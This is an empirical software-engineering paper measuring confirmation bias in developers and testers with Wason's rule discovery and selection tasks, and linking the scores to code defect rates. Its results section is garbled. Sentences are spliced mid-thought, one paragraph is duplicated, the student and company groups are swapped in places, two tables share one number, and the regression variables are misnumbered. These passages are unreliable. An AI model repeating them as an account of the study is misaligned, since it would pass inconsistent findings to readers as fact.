Background: During all levels of software testing, the goal should be to fail the code. However, software developers and testers are more likely to choose positive tests rather than negative ones due to the phenomenon called confirmation bias. Confirmation bias is defined as the tendency of people to verify their hypotheses rather than refuting them. In the literature, there are theories about the possible effects of confirmation bias on software development and testing. Due to the tendency towards positive tests, most of the software defects remain undetected, which in turn leads to an increase in software defect density.
Aims: In this study, we analyze factors affecting confirmation bias in order to discover methods to circumvent confirmation bias. The factors, we investigate are experience in software development/testing and reasoning skills that can be gained through education. In addition, we analyze the effect of confirmation bias on software developer and tester performance.
Method: In order to measure and quantify confirmation bias levels of software developers/testers, we prepared pen-and-paper and interactive tests based on two tasks from cognitive psychology literature. These tests were conducted on the 36 employees of a large scale telecommunication company in Europe as well as 28 graduate computer engineering students of Bogazici University, resulting in a total of 64 subjects.
We evaluated the outcomes of these tests using the metrics we proposed in addition to some basic methods which we inherited from the cognitive psychology literature.
Results: Results showed that regardless of experience in software development/testing, abilities such as logical reasoning and strategic hypotheses testing are differentiating factors in low confirmation bias levels. Moreover, the results of the analysis to investigate the relationship between code defect density and confirmation bias levels of software developers and testers showed that there is a direct correlation between confirmation bias and defect proneness of the code.
Conclusions: Our findings show that having strong logical reasoning and hypothesis testing skills are differentiating factors in the software developer/tester performance in terms of defect rates. We recommend that companies should focus on improving logical reasoning and hypothesis testing skills of their employees by designing training programs. As future work, we plan to replicate this study in other software development companies. Moreover, we will use confirmation bias metrics in addition to product and process metrics in software defect prediction. We believe that confirmation bias metrics would improve the prediction performance of learning based defect prediction models which we have been building over a decade.
Categories and Subject Descriptors
H.1.2 [User/Machine Systems]: Human Factors, Software Psychology
General Terms
Measurement, Experimentation, Human Factors
Keywords
Cognitive biases, confirmation bias, software engineering, software testing
1. INTRODUCTION
One of the basic components of software development and testing are the human aspects.
Among these human aspects are cognitive biases, which are defined as the deviation of human mind from the laws of logic and accuracy [1]. The notion of cognitive biases was first introduced by Tversky and Kahneman [2,3]. There are various cognitive bias types such as availability, representativeness, anchoring and adjustment.
As far as we know, Stacy and MacMillian are the two pioneers who recognized the possible effects of cognitive biases on software engineering [1]. Another study is by Parsons and Saunders [4], who empirically showed the existence of adjustment and anchoring on software artifact reuse.
Confirmation bias, which is one of these cognitive biases, is also likely to affect software development process, as it was previously indicated by Stacy and MacMillian [1]. The tendency of people to seek for evidence that could verify their theories rather than seeking for evidence that could falsify them is called confirmation bias. The term confirmation bias was first used by Peter Wason in his rule discovery experiment, where the subject must try to refute his/her hypotheses to arrive at a correct solution [5].
Wason also explained the results of his selection task experiment using facts based on confirmation bias [7]. In this task, Wason gave subjects partial information about a set of objects, and asked them to specify what further information they would need to tell whether or not a conditional rule ("If A, then B") applies. It has been found repeatedly that people perform badly on various forms of this test, in most cases ignoring information that could potentially refute the rule.
Empirical evidence shows that software testers are more likely to choose positive tests rather than negative tests [8]. However, during all levels of software testing the attempt should be to fail the code to reduce software defect density. In order to discover more defects, confirmation bias levels of testers and developers need to be low.
In this study, we propose a method to measure/quantify confirmation bias levels, so that empirical studies about the effect of confirmation bias on software development/testing can be carried out. Our methodology consists of interactive and written tests based on Wason’s rule discovery and selection tasks, respectively. We analyze the outcomes of our tests based on the existing work in cognitive psychology literature as well as the metrics we have defined during this study.
The rest of the paper is organized as follows: Detailed information about confirmation bias and related work in cognitive psychology literature are given in Section II. We explain our methodology for measurement/quantification of confirmation bias in Section III. Metrics we defined for this study are explained in Section IV. We mention the dataset used in our empirical analysis in Section V. In Section VI results together with their corresponding interpretations are presented. Finally, the impact of the results and potential future directions are discussed in Section VII.
2. CONFIRMATION BIAS
This section explains the two experiments proposed by P. C. Wason [5,7] to show the presence of confirmation bias.
2.1 Wason’s Rule Discovery Experiment
In this experiment, Wason asked his subjects to discover a simple rule about triples of numbers [5]. Initially, subjects are given a record sheet on which the triple "2, 4, 6" is written.
The experimental procedure can be explained as follows: The subjects are told that "2 4 6" conforms to this rule. In order to discover the rule, they are asked to write down triples together with the reasons of their choice on the record sheet. After each instance, the tester tells whether the instance conforms to the rule or not. The subject can announce the rule only when he/she is highly confident. If the subject cannot discover the rule, he/she can continue giving instances together with reasons for his/her choice. This procedure continues iteratively until either the subject discovers the rule or he/she wishes to give up. If the subject cannot discover the rule in 45 minutes, the experimenter aborts the test.
Wason designed this experiment in a way such that subjects mostly showed a tendency to focus on a set of triples that is contained inside the set of all triples conforming to the correct rule. Due to this fact, discovery of the true rule was possible only by refuting hypotheses that come to mind.
2.1.1 Eliminative/Enumerative Index
Wason’s eliminative/enumerative index aims to give an idea about the kind of thinking of subjects by considering the nature of the instances given by the subjects in relation to their reasons for choice. This index is calculated as a ratio between the number of subsequent instances incompatible with each reason proposed to the number of compatible instances, summed over all proposed reasons. It is desirable to have eliminative/ enumerative index to be greater than 1. Wason indicates that when this value is greater than 1 (the higher the better), the less confirmation bias of the subject is.
2.1.2 Test Severity
In [6], Poletiek mentions severity of the tests, which corresponds to the instances given by subjects, to discover the rule in Wason’s selection task. A test is more severe when the chance of the supporting observation occurring under the assumption of the hypothesis H exceeds the chance of its occurring without the assumption of the H (i.e. with the assumption of the background knowledge b only). The higher this ratio is (exceeds 1), the higher the severity of the test is. In other words, when the severity of a test is high, more alternative hypotheses are eliminated.
2.2 Wason’s Selection Task
In the original Wason’s Selection Task, the subject is given four cards, where each card has a letter on one side and a number on the other side. These four cards are placed on a table showing respectively D, K, 3, 7. Given the hypothesis “Every card that has a D on one side has a 3 on the other side”, the subject is asked which card(s) must be turned over to find out whether the hypothesis is true or false. The hypothesis can be translated into the logical implication of the form “If P, then Q”, whereas each test is the selection of one of the cards (P, not-P, Q, not-Q). Wason interprets selection of the cards D and 3 (i.e. P and Q) as a choice of a verifier, whereas the subject is defined to be a falsifier if he/she selects the cards D and 7 (i.e. P and not-Q). However, subject can choose cards D and 3 due to matching bias as well as confirmation bias [6, 9, 10].
2.2.1 Matching Bias
Matching bias may lead subjects to select cards on the basis of a simple judgment of relevance. In other words, the selection of the correct cards in the original Wason’s selection task can also result due to matching of the letter D and number 3 in the stated
hypothesis. The separation of matching from logic requires use of rules of the form if P, then Q and three negated forms of the same rule, which are of the form if P, then not Q, if not P, then Q and if not P, then not Q respectively.
In [4], Evans and Lynch used the negated version of the selection task (i.e. if P, then not-Q) as well as the original task (i.e. if P, then Q). In this experimental study, the subjects chose P and Q cards, instead of P and not-Q cards. Evans and Lynch interpreted subjects’ behavior as either being falsifying or matching. However, if a subject, who has chosen P and Q cards in the standard version, also selects P and Q cards in the negated version, such behavior can be explained only by matching bias. Otherwise, subject's verifying behavior accompanied by falsifying behavior would not make sense. In this study, all four negated forms are used to predict matching bias.
3. PROPOSED APPROACH TO MEASURE/QUANTIFY CONFIRMATION BIAS
In order to conduct an empirical analysis, we need a methodology to measure/quantify confirmation bias level of individuals. For this purpose, we prepared two types of tests that are interactive test and written test.
3.1 Interactive Test
What we call interactive test is Wason’s rule discovery task [5]. Interactive test was carried out just as the original task as mentioned before.
3.1.1 Calculation of Test Severity
There are various challenges in evaluating test severity. Firstly, the set of all possible hypotheses (i.e. background knowledge) is infinite. Secondly, humans cannot easily keep more than one hypothesis at a time [6]. On the other hand, according to Poletiek, a severe tester will not consciously formulate all hypotheses one by one, yet he/she will be able to make a globally accurate estimation [6]. Hence, it is not necessary to generate explicitly all possible alternatives in order to generate a more or less severe test.
In order to calculate test severity we followed the method employed by Poletiek in [6]. We took the set of hypotheses, generated by the subjects during our interactive tests, as the plausible set of hypotheses (i.e. background knowledge). For each instance given by the subject (i.e. test made by the subject), we followed the following procedure:
- If the test is positive (i.e. the instance given by the subject conforms to the rule to be discovered), then we took the number of hypotheses that are eliminated by the test as severity of the test. In other words, the hypotheses to which the given instance does not conform are taken into account.
- If the test is negative (i.e. the instance given by the subject does not conform to the rule to be discovered), then we took the number of hypotheses to which the given instance conforms, as severity of the test.
Table 1 shows the set of plausible hypotheses we generated using the rules announced by the subjects during our interactive tests. Our set of plausible alternatives consist of 27 hypotheses, hence severity of each instance given by a subject is within the range [0, 27].
3.1.2 Vincent Curves
As Wason defines in [5], Vincent curves represent performance of subjects towards a criterion, which is not defined by fixed number of trials. During interactive tests, total number of instances given before discovery of the correct rule varies from one subject to another. Hence, Vincent curves can be used to visualize the change in test severity of a group of subjects until the correct rule is discovered. Although, there are variants of Vincent curves, we use the original method proposed by Vincent as follows:
- Total number of instances given by each subject in the group is divided into N equal fractions.
- Within each fraction, we calculate the average of test severities of the instances that fall into that fraction. This calculation is done for each subject in the group.
For N equal fractions, N+1 data points are obtained per subject. The average of the i\textsuperscript{th} data point of all subjects gives the i\textsuperscript{th} data point for the group of subjects, where i = 1, 2, ..., N+1.
We have selected total number of fractions (N) to be equal to the minimum number of instances given within the group before discovery of the correct rule. For number of instances which are not divisible by N, we used Vincent’s original procedure. For instance, the division of 22 instances given by each subject among 5 fractions would be 5, 5, 4, 4, 4. In other words, 2 additional instances are distributed one by one, starting from the first fraction.
3.2 Written Test
Written test is based on Wason’s selection task [7]. There are three different types of questions in the written test which are abstract questions, thematic questions and questions with software development theme.
Abstract questions require pure logical reasoning to be answered correctly; however some of this type of questions can also be answered correctly by matching. In our test, there are 8 abstract questions.
Thematic questions can be answered correctly using the cues produced by memory. This phenomenon where the stage of logical reasoning is bypassed is called memory cueing [8]. In our test there are 6 thematic questions which can be solved correctly through everyday life experience.
Questions with software development/testing theme are also thematic questions where pure logical reasoning can be bypassed by experience in software development and testing. Our test contains 8 questions of this type.
3.2.1 Determination of Existence of Matching Bias
Matching bias detection and classification of subjects as being falsifier, verifier or matcher can be done using abstract test results. In order to detect the existence of matching bias among subjects and classify them, we used all negated variants of Wason’s original selection task.
- If there is a D on one side of the card, then there is a 3 on its other side
• If there is a D on one side of the card, then there is not a 3 on its other side
• If there is not a D on one side of the card, then there is a 3 on its other side
• If there not is a D on one side of the card, then there is not a 3 on its other side
Table 1. The plausible set of hypotheses used for test severity calculation
<p>| | |</p>
<table>
<thead>
<tr>
<th></th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Integers ascending with increments of 2</td>
</tr>
<tr>
<td>2</td>
<td>Integers ascending with increments of k, where k = 1, 2, ...</td>
</tr>
<tr>
<td>3</td>
<td>Three integers in ascending order such that the average of the first and third integer is the second integer</td>
</tr>
<tr>
<td>4</td>
<td>The average of the first and third integer is the second integer</td>
</tr>
<tr>
<td>5</td>
<td>Even integers ascending with increments of 2</td>
</tr>
<tr>
<td>6</td>
<td>Integers ascending with increments of m = 2k, where k = 1, 2, 3, ...</td>
</tr>
<tr>
<td>7</td>
<td>Integers ascending or descending with increments of m = 2k, where k = 1, 2, 3, ...</td>
</tr>
<tr>
<td>8</td>
<td>Even integers in ascending order</td>
</tr>
<tr>
<td>9</td>
<td>Positive even integers in ascending order</td>
</tr>
<tr>
<td>10</td>
<td>Three even integers in any order</td>
</tr>
<tr>
<td>11</td>
<td>Three integers in any order, none of them are identical</td>
</tr>
<tr>
<td>12</td>
<td>Three integers in any order, two or three of them are identical</td>
</tr>
<tr>
<td>13</td>
<td>Three integers in ascending order such that difference between third and first number is even</td>
</tr>
<tr>
<td>14</td>
<td>Integers ascending or descending with increments of k, where k = 1, 2, 3, ...</td>
</tr>
<tr>
<td>15</td>
<td>Sum of the first and second integer is the third integer</td>
</tr>
<tr>
<td>16</td>
<td>The triples of the form (2n 4n 6n), where n = 1, 2, 3, ...</td>
</tr>
<tr>
<td>17</td>
<td>The triples of the form (n 2n 3n), where n = 1, 2, 3, ...</td>
</tr>
<tr>
<td>18</td>
<td>Second integer is greater than the first one</td>
</tr>
<tr>
<td>19</td>
<td>Third integer is greater than the first integer</td>
</tr>
<tr>
<td>20</td>
<td>Difference between the third and the first integer is even</td>
</tr>
<tr>
<td>21</td>
<td>Greatest common divisor (GCD) of the integers is 2</td>
</tr>
<tr>
<td>22</td>
<td>Ascending integers such that each integer is 1 less than a prime number</td>
</tr>
<tr>
<td>23</td>
<td>Any three rational numbers</td>
</tr>
<tr>
<td>24</td>
<td>Positive real numbers in increasing order</td>
</tr>
<tr>
<td>25</td>
<td>Positive integers in increasing order</td>
</tr>
<tr>
<td>26</td>
<td>Three integers whose sum is even</td>
</tr>
<tr>
<td>27</td>
<td>Three even integers greater than zero</td>
</tr>
</tbody>
</table>
3.2.2 Falsifier/Verifier/Matcher Classification
As previously mentioned, given the conditional rule of the form if P, then Q, the subject who selects P, Q as the answer can either be a verifier or matcher. Similarly, the same answer for the rule if P, then not-Q, means that the subject can be a falsifier or a matcher. In order, to overcome this fuzziness, we employ the method of Reich and Ruth [14], which is explained below as follows:
• choice of not-Q in the rule "If P, then Q" = falsifying
• choice of not-Q in the rule "If P, then not Q" = verifying
• choice of P in the rule "If not P, then Q" = matching
• choice of not-Q in the rule "If not-P, then Q" = falsifying
• choice of P in the rule "If not P, then not Q" = matching
• choice of not-Q in the rule "If not P, then not Q" = verifying
This method of determining response tendencies is advantageous, as it does not confound strategies that might have contributed to a particular selection. However, it neglects a large proportion of data provided by the subjects. On the other hand, it gives a general view about the subjects’ responses and it is the only classification strategy we came across in the existing psychology literature. For these reasons, we used the method of Reich and Ruth and we labeled subjects, whom we could not classify, as None.
4. METRICS
In order to perform empirical analysis, we also defined some metrics, in addition to the metrics and methodologies we inherited from cognitive psychology literature. Other than Wason’s eliminative enumerative index (Ind Elim/Enum), the remaining metrics have been defined by us.
Among interactive test metrics, total time it takes to discover the correct rule (T1) and total number of rule discovery attempts (N4) are performance metrics. On the other hand, frequency of immediate rule announcements (FRR), average length of consecutive immediate rule announcements (avg IR) and average frequency of reason repetition/reformulation (avg FR) are supposed to measure the extend of experimental procedure violation. The experimental procedure does not allow immediate rule announcements. However, during interactive tests some subjects made immediate rule announcements, although they had been told the experimental procedure at the beginning.
Written test metrics measure performance in different sections of the written test. These are the score in abstract questions (SAB), thematic questions (SA) and questions with software development/testing theme (SW) respectively. Each score metric is calculated as the ratio of the number of correctly answered questions to the total number of abstract questions. In addition, total duration it takes to solve thematic and abstract sections (TThAbs) and the duration it takes to solve the sections with software development/testing theme (TSW) are among written test metrics. All of the metrics are given in Table 2 together with their explanations.
5. DATA
We conducted both interactive and written tests to two different groups of subjects.
The first group (Group 1) consists of 28 computer engineering graduate students of Bogazici University. 14 of the subjects in Group 1 have software development experience in various companies for more than 2.51 years on average. Among subjects having software development experience above 2.51 years, 6 of them are still active and they are developing embedded software for RoboCup, which is an international robotics competition founded in 1993.
Members of Group 2 are software developers/testers working in a large scale telecommunication company in Europe. Unlike subjects of Group 1, this group of subjects has only undergraduate degrees in Computer Engineering, Mathematics and related fields. There are two different project groups within Group 2. The first project group, which employs traditional waterfall software development methodology, consists of 28 subjects. Among these 28 subjects, 12 of them are developers, while 16 of them are testers. The second project group consists of 8 subjects who develop software using TSP/PSP methodology.
Table 2. Interactive and written test metrics with their abbreviations
<table>
<thead>
<tr>
<th>Interactive Test Metrics</th>
<th>Metric Explanation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Abbr.</td>
<td>Metric Explanation</td>
</tr>
<tr>
<td>IndElim/Enum</td>
<td>Wason’s eliminative/enumerative index [5]</td>
</tr>
<tr>
<td>T_i</td>
<td>Total time it took to discover the correct rule</td>
</tr>
<tr>
<td>FRR</td>
<td>Immediate rule announcement frequency</td>
</tr>
<tr>
<td>avg_L_IR</td>
<td>Total number of rule announcements in a series, where no instances are given in between rule announcements</td>
</tr>
<tr>
<td>avg_FRR</td>
<td>Average frequencies of reason repetition/reformulation</td>
</tr>
<tr>
<td>NA</td>
<td>Total number of rule discovery attempts including the correct rule announcement</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Written Test Metrics</th>
<th>Metric Explanation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Abbr.</td>
<td>Metric Explanation</td>
</tr>
<tr>
<td>S_ABS</td>
<td>Score in abstract questions</td>
</tr>
<tr>
<td>S,Th</td>
<td>Score in thematic questions</td>
</tr>
<tr>
<td>T,Th+ABS</td>
<td>Duration it took to solve abstract and thematic questions (minutes)</td>
</tr>
<tr>
<td>S_SW</td>
<td>Score in questions with software development/testing theme</td>
</tr>
<tr>
<td>T_SW</td>
<td>Duration it took to solve questions with software development/testing theme (minutes)</td>
</tr>
</tbody>
</table>
1 Abbr. stands for "Abbreviation".
6. RESULTS
This section consists of two parts. In the first part, the effects of factors such as education, experience in software development/testing and software development methodologies, on confirmation bias are analyzed. In the second part, we investigate the effects of confirmation bias on software development and testing.
6.1 Analysis of the Factors Affecting Confirmation Bias:
6.1.1 Effect of Education on Confirmation Bias
As shown in Figure 1, according to Reich and Ruth’s classification method, there are more falsifiers and less verifiers in Group 1, compared to Group 2. These results imply that subjects of Group 1 exhibit lower confirmation bias levels. In addition, existence of matchers only in Group 2 (13.16% of Group 2 population) supports the fact that members of Group 1 use more logical reasoning. These results are in favor of Group 1 members, who are graduate computer engineering students and obliged to take theoretical computer science courses according to the graduate curriculum. It is highly probable that these courses helped Group 1 members to gain skills to perform logical reasoning, since they frequently experienced the fact that a given statement does not always have to be true and hence it may require to be disproved. In other words, Group 1 members have been trained to lower their confirmation bias levels through courses that require logical reasoning.
Figure 1. Distribution of falsifiers, verifiers, and matchers in Group 1 and Group 2 according to Reich and Ruth’s method.
6.1.2 Effect of Software Development/Testing Experience on Confirmation Bias
In order to see how confirmation bias levels are affected by experience in software development/testing, we performed three different analyses. In our first analysis, we compared interactive and written test metric values of two subgroups within Group 1. The first subgroup (Group1_EXP) consists of subjects who have worked in software development industry for more than or equal to 2.51 years, which is the average years of experience among Group 1 members. The rest of the subjects are categorized under the second subgroup (Group1_NEXP). In order to compare interactive and written test metric values of Group1_EXP and...
Group1_NEXP, we performed bootstrapped Kolmogorov-Smirnov test. As shown in Table 3, the only significant difference obtained is in the scores of the written test with software development and testing theme ($S_{SW}$). Members of group who have experience in software development/testing scored significantly higher, since in written test they used their software development knowledge gained through experience, in addition to logical reasoning.
In the second analysis, we employed the Reich and Ruth categorization method. The distribution of falsifiers and verifiers, as well as those that could not be categorized is shown in Figure 1. 64.29% of experienced members in Group 1 and 57.29% of members of Group 1 with less experience are falsifiers. However, 21.43% of experienced Group 1 members and 7.14% of less experienced members are verifiers. These distribution results imply no significant difference among experienced and less experienced members of Group 1.
In the third analysis, we statistically compared experienced members of Group 2 (Group2_EXP) and less experienced Group 2 (Group2_NEXP). As shown in Table 4, no significant difference was found among the members of Group2_EXP and Group2_NEXP. Group2_EXP consist of Group 2 members who have less than 5.71 years which is the average years of experience in software development/testing among Group 2 members mostly engaged in research studies. Table 7 shows the statistical comparison of the metric values for Group1_ACTIVE and Group1_INACTIVE. As it can be seen, no significant difference has been observed in metric values within the 0.05 significance level.

We have also categorized members of Group1_ACTIVE and Group1_INACTIVE separately as falsifiers, verifiers and matchers according to Reich and Ruth’s method. In both subgroups, subjects that could not be categorized according to the Reich and Ruth’s scheme are labeled as None. As previously mentioned and shown in Figure 1, no matchers were found among the members of Group 1. Hence, we cannot observe any matchers in Figure 2 either. However, results seem in favor of Group1_INACTIVE members, as a higher portion of Group1_INACTIVE population is falsifiers and a lower portion of the population is verifiers when for autonomous robots. The rest of the Group1_EXP members are not active in software development/testing anymore and they are
Table 4. Results of the bootstrapped Kolmogorov-Smirnov test among experienced and less experienced members of Group 2.
<table>
<thead>
<tr>
<th></th>
<th>Group 2_EXP</th>
<th>Group 2_NEXP</th>
<th>p-value</th>
</tr>
</thead>
<tbody>
<tr>
<td>$Ind_{Ele/Enum}$</td>
<td>1.11</td>
<td>1.12</td>
<td>0.6899</td>
</tr>
<tr>
<td>$T_I$</td>
<td>18.06</td>
<td>16.59</td>
<td>0.3874</td>
</tr>
<tr>
<td>$F^IR$</td>
<td>1.00</td>
<td>0.67</td>
<td>1.0000</td>
</tr>
<tr>
<td>$avg_L^{IR}$</td>
<td>0.55</td>
<td>0.53</td>
<td>1.0000</td>
</tr>
<tr>
<td>$avg_F^{RR}$</td>
<td>1.17</td>
<td>0.80</td>
<td>0.8644</td>
</tr>
<tr>
<td>$N_A$</td>
<td>3.61</td>
<td>2.18</td>
<td>0.1170</td>
</tr>
<tr>
<td>$S_{ABS}$</td>
<td>0.19</td>
<td>0.13</td>
<td>0.3874</td>
</tr>
<tr>
<td>$S_{Th}$</td>
<td>0.72</td>
<td>0.71</td>
<td>0.9313</td>
</tr>
<tr>
<td>$T_{Th+ABS}$</td>
<td>18.12</td>
<td>14.5</td>
<td>0.2336</td>
</tr>
<tr>
<td>$S_{SW}$</td>
<td>0.46</td>
<td>0.53</td>
<td>0.9303</td>
</tr>
<tr>
<td>$T_{SW}$</td>
<td>17.59</td>
<td>14.41</td>
<td>0.3874</td>
</tr>
</tbody>
</table>
compared to the falsifier and verifier portions within the Group1 ACTIVE population.
When we consider Figure 1 and Figure 3 together, we can make the following observation: Among groups of subjects that consist of members active in software development/testing, lower portion of falsifiers and higher portion of verifiers are observed. This is an undesired situation as it implies high confirmation bias levels. In order to further investigate this claim of ours we conducted the following analysis: We removed 6 members who are still active in software development/testing from Group 1. We named the resulting group as Group 1’.
We used Reich and Ruth’s categorization method on the members of this group and compared the distribution of falsifiers, verifiers and matchers within Group 1’ with the one in Group 2. Figure 4 shows the resulting categorization scheme, where higher portion of Group 1’ population is falsifier; whereas verifiers form a lower portion, compared to the falsifier and verifier portions of Group 2.
During our analysis, we took into account only 12 developers of Group1 who develop software based on waterfall methodology and named this subgroup as Group2 REGULAR. As shown in Table 6, no significant statistical difference. As we can see in Figure 5, according to Reich and Ruth classification scheme, a higher portion falsifiers and a lower portion of verifiers are observed in Group2 REGULAR compared to falsifier and verifier portions in Group2 TSP/PSP population. These results seem in favor of Group2 REGULAR. However, 8.33% of Group2 REGULAR are matchers, who cannot excel logical reasoning. Moreover, in both subgroups Group2 REGULAR and Group2 TSP/PSP, a high portion of uncategorized subjects are observed.
<table>
<thead>
<tr>
<th>Metric</th>
<th>Group1 ACTIVE</th>
<th>Group1 INACTIVE</th>
<th>p-value</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ind</td>
<td>0.9160</td>
<td>1.5178</td>
<td>0.4505</td>
</tr>
<tr>
<td>T</td>
<td>10.4000</td>
<td>7.6667</td>
<td>0.7160</td>
</tr>
<tr>
<td>F</td>
<td>0.0000</td>
<td>0.2222</td>
<td>0.0505</td>
</tr>
<tr>
<td>avg_L_IR</td>
<td>0.0000</td>
<td>0.2222</td>
<td>0.0515</td>
</tr>
<tr>
<td>avg_F_IR</td>
<td>1.1000</td>
<td>0.4444</td>
<td>0.3890</td>
</tr>
<tr>
<td>N</td>
<td>1.2000</td>
<td>2.1111</td>
<td>0.6920</td>
</tr>
<tr>
<td>S_ABS</td>
<td>0.5870</td>
<td>0.5300</td>
<td>0.5780</td>
</tr>
<tr>
<td>S_TH</td>
<td>0.8600</td>
<td>0.8667</td>
<td>0.3595</td>
</tr>
<tr>
<td>T_TH+ABS</td>
<td>16.6667</td>
<td>14.7778</td>
<td>0.5870</td>
</tr>
<tr>
<td>S_SW</td>
<td>0.8417</td>
<td>0.7689</td>
<td>0.3350</td>
</tr>
<tr>
<td>T_SW</td>
<td>12.6667</td>
<td>10.1111</td>
<td>0.4910</td>
</tr>
</tbody>
</table>
6.1.3 Effect Waterfall and TSP/PSP Software Development Methodologies on Confirmation Bias
In order to analyze the effect of waterfall and TSP/PSP software development methodologies, we statistically compared the interactive and written test metric values for two subgroups within group 2. As mentioned previously, 28 members of Group 1 are software developers/tester assigned to a software development projects using the regular waterfall methodology. Remaining 8 members of Group 2 (Group2 TSP/PSP) are responsible from a pilot software development project following TSP/PSP methodology. Among members of TSP/PSP group, 3 of them gave up the interactive test before discovering the correct rule. The interactive test metrics $T_I$ and $N_A$ can be measured only when a subject succeeds to discover the correct rule. Only 5 values for each metric exist, which is unlikely to give accurate results. Hence, during statistical comparison of metric values among these two groups, $T_I$ and $N_A$ metrics have been excluded.
Figure 3. Distribution of falsifiers, verifiers, and matchers among the experienced active and experienced inactive members of Group 1 according to Reich and Ruth’s method.
Figure 4. Distribution of falsifiers, verifiers, and matchers among members of Group 1 and Group 2 according to Reich and Ruth’s method.
During our analysis, we took into account only 12 developers of Group1 who develop software based on waterfall methodology and named this subgroup as Group2 REGULAR. As shown in Table 6, no significant statistical difference. As we can see in Figure 5, according to Reich and Ruth classification scheme, a higher portion falsifiers and a lower portion of verifiers are observed in Group2 REGULAR compared to falsifier and verifier portions in Group2 TSP/PSP population. These results seem in favor of Group2 REGULAR. However, 8.33% of Group2 REGULAR are matchers, who cannot excel logical reasoning. Moreover, in both subgroups
Group2_{REGULAR} and Group2_{TSP/PSP}, a high portion of uncategorized subjects are observed.

6.2 Analysis of the Effects of Confirmation Bias on Software Development and Testing Performances
6.2.1 Effect of Confirmation Bias on Software Development Performance
We performed an analysis among 28 members of Group 1, who are all belong to a project group responsible from the development of the customer services software package. Within this project group, which develops software according to the traditional waterfall methodology, software testing team consists of 11 software testers, while the remaining 17 subjects are software developers. Every two weeks, a new release of the software is delivered and hence testing phase of one release and the development phase of the next release overlap. In this study, we analyzed 10 releases of the software that were developed and tested between the last week of May 2009 and second week of November 2009. For each release, we categorized each file to be defected or not based on the results of the testing phase for that release. Moreover, a file that was updated or created within a specific release but not updated during the following releases, was also categorized as defective if defects were found in that file during the testing phase of the following releases. For defects detected within a file during each testing phase, developers who created and updated that file before that testing phase were held responsible.
Based on the commit history of the files comprising the software package, we discovered that most of the files were updated by more than one developer. In other words, each file is developed by a group of one or more developers. As a result of churn data analysis, we found 124 developer groups and for each developer group we evaluated the defected file percentage among all the files created or updated by that group. Defected file percentage of each group is the measure we have selected to assess performance of each group of software developers. For each developer group, we also evaluated the average, minimum and maximum values of the 11 confirmation bias metrics that were listed in Table 4. In addition to confirmation bias metrics, we took into account the average, minimum and maximum test severity values to assess the hypotheses testing performance of a subject during the interactive test. Our method to evaluate the confirmation bias related parameters can be formulated as follows:
\[
\begin{align*}
X_1 &= \text{Ind}_{E_{lim/Enum}}^{1 \cdots N} \\
X_2 &= \text{Ind}_{E_{lim/Enum}}^{1 \cdots N} \\
X_3 &= T_{I}^{1 \cdots N} \\
X_4 &= F_{IR}^{1 \cdots N} \\
X_5 &= (\text{avg } L_{IR}^{1 \cdots N})^{1 \cdots N} \\
X_6 &= (\text{avg } F_{RR}^{1 \cdots N})^{1 \cdots N} \\
X_9 &= S_{Th}^{1 \cdots N} \\
X_10 &= T_{Th+ABS}^{1 \cdots N} \\
X_{11} &= S_{SW}^{1 \cdots N} \\
X_{12} &= T_{SW}^{1 \cdots N} \\
X_{13} &= TestSeverity_{avg}^{1 \cdots N} \\
X_{14} &= TestSeverity_{max}^{1 \cdots N} \\
X_{15} &= TestSeverity_{min}^{1 \cdots N}
\end{align*}
\]
\[X_{avg} = \frac{\sum_{i=1}^{N} X_1^i}{N} \ldots \frac{\sum_{i=1}^{N} X_{15}^i}{N}\]
(1)
Each \(X_i\) \(X_{15}\) are the confirmation bias metrics given in Table 2, while \(X_7\) is elimination/enumeration index taking into account only the last rule announcement instead of every rule announcement made by the subject. Finally, \(X_{13}, X_{14}\) and \(X_{15}\) are respectively average, minimum and maximum test severities of each developer in a given group.
Having evaluated confirmation bias related parameters of
developer groups, we performed multi-linear regression modeling to find the relation between confirmation bias and percentage of defected files.
\[ y = X\beta + \varepsilon \quad (3) \]
Table 7. The values of regression coefficients with their confidence intervals.
<table>
<thead>
<tr>
<th>Coefficient</th>
<th>Coefficient Value</th>
<th>Confidence Interval</th>
<th>p value</th>
</tr>
</thead>
<tbody>
<tr>
<td>( \beta_1 )</td>
<td>6.5669</td>
<td>6.0569 - 7.0688</td>
<td>1.0791E-12</td>
</tr>
<tr>
<td>( \beta_2 )</td>
<td>0.2696</td>
<td>0.0507 - 0.4896</td>
<td>0.0162</td>
</tr>
<tr>
<td>( \beta_3 )</td>
<td>-0.1472</td>
<td>-0.4809 - 1.1866</td>
<td>0.3843</td>
</tr>
<tr>
<td>( \beta_4 )</td>
<td>1.4814</td>
<td>1.0971 - 1.8657</td>
<td>6.543E-12</td>
</tr>
<tr>
<td>( \beta_5 )</td>
<td>0.6248</td>
<td>0.0496 - 1.2000</td>
<td>0.0335</td>
</tr>
<tr>
<td>( \beta_6 )</td>
<td>-1.2697</td>
<td>-1.9005 - -0.6309</td>
<td>1.167E-4</td>
</tr>
</tbody>
</table>
Since the existence of linear dependency leads to matrix singularity problem, we performed principal component analysis (PCA). Hence, we constructed a multiple linear regression model with 5 parameters (i.e. \( \beta_2 , \beta_3 , \beta_4 , \beta_5 , \beta_6 \)) which are the linear combinations of average confirmation bias related parameters (i.e. \( X = X_{avg} \)) The coefficients for the resulting parameters that turned out to significantly contribute to the model together with their confidence intervals at \( \alpha = 0.05 \) significance level, are shown in Table 7. The R\(^2\) statistic is 0.4477 and the adjusted R\(^2\) statistic is 0.4243 which implies that about 42% of the variability in defect percentage is explained by the parameters given in Table 7. If we take into account the fact that defect rate is affected by process and many human attributes other than confirmation bias the results obtained are quite significant.
6.3 Analysis of the Effects of Confirmation Bias on Tester Performance
In this part of our work, we analyzed the effect of confirmation bias on tester performance. For this purpose, we inherited two tester performance metrics from tester competence reports of the company among whose employees are members of Group 2. These metrics are the number of bugs reported \((N_{BUG})\) and the number of production defects caused \((N_{PROD_DEF})\) by each tester respectively. Production defects are the defects that could not be detected by testers during testing phase and they are revealed by customers after the software is released. We grouped members of Group 2 based on the values of \(N_{BUG}\) and \(N_{PROD_DEF}\).
